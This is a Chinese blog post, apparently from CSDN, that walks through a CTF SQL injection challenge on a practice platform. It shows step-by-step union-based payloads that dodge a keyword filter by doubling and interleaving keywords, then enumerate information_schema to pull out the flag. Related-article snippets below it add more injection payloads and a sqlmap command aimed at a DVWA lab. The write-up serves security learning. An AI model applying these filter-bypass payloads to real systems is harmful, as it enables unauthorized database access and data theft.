简单的sql注入之一 (实验吧)

最新推荐文章于 2025-07-17 10:31:56 发布
最新推荐文章于 2025-07-17 10:31:56 发布
阅读量3.9k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wewww111/article/details/81589444
本文介绍了一种通过SQL注入攻击获取数据库信息的方法。具体包括利用多种技术绕过关键字过滤,例如大小写交替、双写关键字及交叉写法。并详细展示了如何使用这些技巧来查询数据库、数据表以及表中的字段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.判断注入类型

1' or '1' = '1 结果如下

测试几个简单的语句后, 1' order by 1 # , 1' select 1 #

根据报错信息 #  -- - order by select 等关键词都被过滤

关键词被过滤:解决方法如下

1大小写交替: Order SeLect 

2.双写  : OderOrder SelectSelect 

3.交叉: selecselectt  

注释符被过滤,解决方法如下:

1.用 '号闭合  ,如having , where

经过测试,发现可用双写绕过关键字过滤,但要注意双写后要加两空格

暴库语句如下:

1' union select schema_name from information_schema.schemata where '1' ='1

 

查询数据表语句如下:

1' unionunion  selectselect  table_name fromfrom  information_schema.tables wherewhere  table_schema='web1 

问题来了:这里报错了,错误如下

可以看到 (table_schema='web1) 等号前的table_chema被过滤了,按以上三种方法(双写,交叉,大小写)测试发现,交叉法可以绕过过滤;

新语句如下:

1' unionunion  selectselect  table_name fromfrom  information_schema.tables wherewhere  table_schemtable_schemaa='web1

发现flag,获取flag表的字段名

1' unionunion  selectselect  column_name  fromfrom  information_schema.columns wherewhere  table_name='flag

又有报错信息

比对后发现,from  infromation_schema.columns  被过滤了,老方法,用交叉写法可以绕过

还有 column_name也被过滤了:

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.columninformation_schema.columnss wherewhere  table_name='flag

发现flag字段名,获取flag

1' unionunion  selectselect  flag fromfrom  flag wherewhere   '1' ='1

 

wewww111
关注
SQL注入实验
xiongIT的博客
10-29 2997
SQL注入实验和站在防御者角度该怎么预防Sql注入
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
m0_74824002的博客
12-13 1215
Hi~ o( ̄▽ ̄)ブ,我是名刚刚开始学习网安的新手。在做PortSwigger实验室(也就是BurpSuit官方做的靶场和学习中心)题目的时候发现对于新手来说还是有很多问题的。上网搜索相关文章发现可能是官方跟新了靶场的题目,导致很多文章已经“货不对板”了。思来想去最后决定自己来写篇通关文章!如果有什么地方写的不好或者有什么错误欢迎大伙指出批评~~ps:该文章包含大量我作为初学者在解题过程中的学习过程和内容,可能会显得很臃肿。
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 222
接上面篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞下。。 输入 1' and 1=1# 按理...
SQL注入实战指南:从零基础到精通的完整教程
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-17 647
本文介绍了手工SQL注入中的联合查询注入方法,重点阐述了MySQL数据库中的特殊数据库和关键字段信息。联合查询注入适用于查询结果能直接在前端显示的场景,通过UNION操作符合并多个SELECT结果。文章详细说明了操作步骤:首先判断注入点数据类型(数字型或字符型),通过四则运算或闭合符号进行验证;然后通过and逻辑判断确认漏洞存在。其中特别强调了information_schema数据库在SQL注入中的重要性,这是获取数据库元数据的关键来源。文中的示例图片展示了注入过程的具体操作。
sql简单注入
weixin_51646864的博客
06-13 725
原理: 当我们在查询些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造些危险的查询语句。 简单union注入步骤: 这里以攻防世界的个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下个或上个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
实验简单sql注入解题思路
ZweLL032的博客
03-17 8385
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造个条件来结束’,注入语句为:1‘ union select flag fro
sql注入简单例子(非常详细),零基础入门到精通,看这篇就够了
weixin_51725318的博客
11-14 4661
sql注入简单例子(非常详细),零基础入门到精通,看这篇就够了
SQL注入攻击实验报告
05-07
然而,由于开发者对安全性的忽视,使得许多Web应用程序存在安全隐患,其中SQL注入攻击是最常见也是最危险的种攻击方式之SQL注入攻击能够使攻击者绕过正常的认证机制,获取敏感信息或控制服务器,对企业和个人...
DVWA之SQL注入详解(包含知识点)
10-20
SQL注入是网络安全领域中的种常见的攻击手段,它允许攻击者通过在应用程序的输入参数中插入恶意的SQL代码片段,从而在数据库服务器上执行未授权的查询或操作。这种攻击方法对数据库安全构成了极大的威胁,因此了解...
【网络攻防技术】实验八——SQL注入实验
qq_45755706的博客
03-01 7570
文章目录实验题目二、实验步骤及结果Task 1: Get Familiar with SQL StatementsTask 2: SQL Injection Attack on SELECT StatementTask 2.1: SQL Injection Attack from webpage.Task 2.2: SQL Injection Attack from command line.Task 2.3: Append a new SQL statement.Task 3: SQL Injecti
网络安全---SQL注入攻击
zdsxc_的博客
04-05 1690
容器通常是次性的,因此旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
网络安全实验sql注入实验
qq_64314976的博客
06-23 983
通过实验学习到SQL注入的基本操作以及使用SQL注入得到数据库里面的用户名和密码等等,刚开始不知道如何从Web服务器向数据访问层发送SQL请求,后来通过同学交流才得以解决。本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明。实例二、节约是种美德,少用空格。
SQL注入简单案例
勇敢的兵
09-01 4048
文章目录什么是SQL注入使用数据库客户端工具查询用户表访问ERP系统(对密码输入框进行SQL注入SQL注入的原理解决方案重新注册个管理员账号使用sys账号登录ERP系统(输入正确的密码)使用sys账号登录ERP系统(对密码输入框进行SQL注入)UserDAO类的完整代码 什么是SQL注入 SQL注入是现在普通使用的种攻击手段,就是通过把非法的SQL命令插入到Web表单中或页面请求查询字符串中...
SQL注入简单例子
Caisi的博客
08-27 1501
动态拼接SQL语句导致SQL注入直接在SQL查询语句拼接查询参数种解决示例:使用列表/元组传入参数 直接在SQL查询语句拼接查询参数 def getUsers(user_id): conn = psycopg2.connect("dbname='demo1' user='postgres' host='127.0.0.1' password='admin'") cur = conn.cursor() if user_id == None: str = 'select
SQL注入
WindRunnerMax
03-05 1741
SQL注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句添加额外的SQL语句,从而实现非法操作,获取数据库数据,服务器提权等,很多机构将SQL注入作为第危险的安全漏洞。 原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/get表单、输入域名或页面请求...
所谓最简单SQL注入
扯蛋的青春与蛋痛的生活
01-12 1983
今天没带眼镜,,所以不太想干活 也不知怎的, 对公司另同事写的业务台模块来了兴趣..帮其"测试下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +
简单SQL注入(小白级)
m0_46625346的博客
05-18 502
简单SQL注入 1.找数据库名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23 //找数据库名 得到wfafaefawcaf 2.找表名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(table_name),3 f
Sql注入实验
Nocker888的博客
11-11 559
Sql注入实验Sql 注入 实验 总结 青春经典当即永不再赎 不怕自己笨,就怕那些比自己笨的人比自己还要努力 Sql 注入 实验 在得到靶机的情况下,寻找带有参数的地方就有定有注入点。 开干,首先是判断注入点 payload如下: // 数字型判断 ?id=1 and 1=1 ?id=1 and 1=2 // 字符型判断 ?id=1' and...
sql注入实验
qq_70311894的博客
09-29 254
sql注入工作原理
dvwasql注入攻击实验base
03-10
### 实验环境准备 为了进行DVWA SQL注入攻击实验,需先搭建好测试平台。确保已安装并配置了DVWA(Damn Vulnerable Web Application),并将安全级别设置为低以便于初次学习[^1]。 ```bash # 启动DVWA服务 service apache2 start ``` ### 测试SQL注入漏洞 当安全等级设为`Low`时,可直接输入恶意字符串进入ID参数框中提交请求。例如,在URL栏里修改`id`值为`' or '1'='1`,这将绕过正常的查询条件使所有记录都符合条件从而被显示出来[^4]。 对于更复杂的场景如`Medium`及以上难度,则可能需要用到自动化工具辅助分析。比如使用Sqlmap这款强大的开源渗透测试工具来探测以及利用SQL注入缺陷: ```python import os os.system(''' python sqlmap.py \ -u "http://192.168.171.10/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="security_level=0; PHPSESSID=ho05i9sr7evr6chgqs3d0d3n50; security=low" \ -D dvwa --tables ''') ``` 上述命令指定了目标网址、会话Cookie,并告诉sqlmap去枚举指定数据库中的表格名称[^2]。 ### 构造有效载荷 了解如何构建特定的有效载荷是掌握SQL注入技术的关键部分之。考虑如下情况:假设存在简单的SELECT查询语句用于检索给定ID对应的数据条目;此时可以通过附加额外的逻辑表达式改变原有意图达到控制输出的目的。像这样的句话就可以实现这点:`select * from users where user_id = 1 OR 1=1 /*`[^3]。 ### 验证结果反馈机制 值得注意的是,不同应用对于异常状况有不同的处理方式——有的可能会抛出详细的错误提示帮助调试程序同时也暴露了内部结构信息;而另些则仅给出模糊的消息或者根本没有回应。因此,在实际操作过程中要善于观察页面变化规律以推测背后发生的交互过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值